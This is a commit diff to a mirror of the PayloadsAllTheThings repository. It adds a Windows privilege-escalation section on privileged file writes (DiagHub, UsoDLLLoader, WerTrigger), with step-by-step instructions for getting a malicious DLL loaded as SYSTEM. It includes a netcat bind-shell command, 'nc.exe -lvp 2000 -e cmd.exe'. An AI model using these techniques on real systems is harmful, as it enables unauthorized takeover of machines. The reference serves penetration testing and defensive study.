mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Privileged File Write
This commit is contained in:
parent
52b0cd6030
commit
0df0cc9cf8
@ -38,6 +38,10 @@
|
||||
* [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
|
||||
* [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
|
||||
* [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
|
||||
* [EoP - Privileged File Write](#eop---privileged-file-write)
|
||||
* [DiagHub](#diaghub)
|
||||
* [UsoDLLLoader](#usodllloader)
|
||||
* [WerTrigger](#wertrigger)
|
||||
* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure)
|
||||
* [MS08-067 (NetAPI)](#ms08-067-netapi)
|
||||
* [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
|
||||
@ -979,6 +983,60 @@ Binary available at : https://github.com/ohpe/juicy-potato/releases
|
||||
[+] CreateProcessWithTokenW OK
|
||||
```
|
||||
|
||||
|
||||
## EoP - Privileged File Write
|
||||
|
||||
### DiagHub
|
||||
|
||||
:warning: Starting with version 1903 and above, DiagHub can no longer be used to load arbitrary DLLs.
|
||||
|
||||
The Microsoft Diagnostics Hub Standard Collector Service (DiagHub) is a service that collects trace information and is programmatically exposed via DCOM.
|
||||
This DCOM object can be used to load a DLL into a SYSTEM process, provided that this DLL exists in the `C:\Windows\System32` directory.
|
||||
|
||||
#### Exploit
|
||||
|
||||
1. Create an [evil DLL](https://gist.github.com/xct/3949f3f4f178b1f3427fae7686a2a9c0) e.g: payload.dll and move it into `C:\Windows\System32`
|
||||
2. Build https://github.com/xct/diaghub
|
||||
3. `diaghub.exe c:\\ProgramData\\ payload.dll`
|
||||
|
||||
The default payload will run `C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe`
|
||||
|
||||
Alternative tools:
|
||||
* https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825/TrigDiag
|
||||
* https://github.com/decoder-it/diaghub_exploit
|
||||
|
||||
|
||||
### UsoDLLLoader
|
||||
|
||||
:warning: 2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview.
|
||||
|
||||
> An alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo)
|
||||
|
||||
If we found a privileged file write vulnerability in Windows or in some third-party software, we could copy our own version of `windowscoredeviceinfo.dll` into `C:\Windows\Sytem32\` and then have it loaded by the USO service to get arbitrary code execution as **NT AUTHORITY\System**.
|
||||
|
||||
#### Exploit
|
||||
|
||||
1. Build https://github.com/itm4n/UsoDllLoader
|
||||
* Select Release config and x64 architecure.
|
||||
* Build solution.
|
||||
* DLL .\x64\Release\WindowsCoreDeviceInfo.dll
|
||||
* Loader .\x64\Release\UsoDllLoader.exe.
|
||||
2. Copy `WindowsCoreDeviceInfo.dll` to `C:\Windows\System32\`
|
||||
3. Use the loader and wait for the shell or run `usoclient StartInteractiveScan` and connect to the bind shell on port 1337.
|
||||
|
||||
|
||||
### WerTrigger
|
||||
|
||||
> Weaponizing for privileged file writes bugs with Windows problem reporting
|
||||
|
||||
1. Copy `phoneinfo.dll` to `C:\Windows\System32\`
|
||||
2. Place `Report.wer` file and `WerTrigger.exe` in a same directory.
|
||||
3. Then, run `WerTrigger.exe`.
|
||||
4. Enjoy a shell as **NT AUTHORITY\SYSTEM**
|
||||
|
||||
https://github.com/sailay1996/WerTrigger
|
||||
|
||||
|
||||
## EoP - Common Vulnerabilities and Exposure
|
||||
|
||||
### MS08-067 (NetAPI)
|
||||
@ -1134,3 +1192,6 @@ Detailed information about the vulnerability : https://www.zerodayinitiative.com
|
||||
* [Living Off The Land Binaries and Scripts (and now also Libraries)](https://github.com/LOLBAS-Project/LOLBAS)
|
||||
* [Common Windows Misconfiguration: Services - 2018-09-23 - @am0nsec](https://amonsec.net/2018/09/23/Common-Windows-Misconfiguration-Services.html)
|
||||
* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf)
|
||||
* [Abusing Diaghub - xct - March 07, 2019](https://vulndev.io/howto/2019/03/07/diaghub.html)
|
||||
* [Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege - James Forshaw, Project Zero - Wednesday, April 18, 2018](https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html)
|
||||
* [Weaponizing Privileged File Writes with the USO Service - Part 2/2 - itm4n - August 19, 2019](https://itm4n.github.io/usodllloader-part2/)
|
Loading…
Reference in New Issue
Block a user